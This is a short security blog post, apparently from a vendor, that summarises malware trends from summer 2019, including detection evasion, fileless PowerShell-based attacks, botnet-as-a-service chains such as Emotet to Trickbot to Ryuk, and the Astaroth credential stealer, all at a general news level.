It’s been a summer of ransomware hold-ups, supply chain attacks and fileless attacks flying under the radar of old-school security. With malware running amok while we were lying on the beach, here’s a recap of the most burning strains and trends seen in the wild during the months of July and August 2019.
Malware Evolution Trends
The heat must have had an effect as this summer saw malware continuing to evolve, particularly around three core trends:
Malware has been increasingly designed to bypass security controls leveraging a host of tactics, most notably by:
- Changing hashes via file obfuscation to evade AVs.
- Using encrypted communication with C2 servers to foil EDRs.
- Using feature manipulation and tampering to trick AI, machine-learning engines, and sandboxes through the detection of such environments and the deliberate delay in execution.
Fileless Attacks and Living-Off-The-Land (LOTL)
Taking evasion techniques one step further, an increasing number of strains are leveraging PowerShell commands and masquerading as legitimate system tools, all while running completely from memory (RAM) to fly under the radar of traditional IoC-based solutions and requiring behavior-based analysis to detect.
(Jack-in-the-box)2 or Jack-in-the-box, Squared
No thanks to underground botnet-as-a-service businesses, whole botnets of compromised systems are rented out to hackers, through which they can leverage ready-made access to live and well systems to simultaneously unleash multiple malware strains at their disposal. For example, Emotet serving IcedID (Bokbot) followed by Trickbot or the Ryuk ransomware.
Deadliest Immediate Threats
What were this summer’s most exotic and lethal malware strains? Here’s a roundup.
Astaroth Malware Uses Living-Off-The-Land (LOTL) Techniques
Targeting European and Brazilian organizations, and posing an immediate threat to 76% of organizations who tested their resilience to it, according to the Cymulate Research Lab, the fileless Astaroth malware evades traditional IoC-based security controls, stealing user credentials, including PII, system and financial data.
images from Hacker News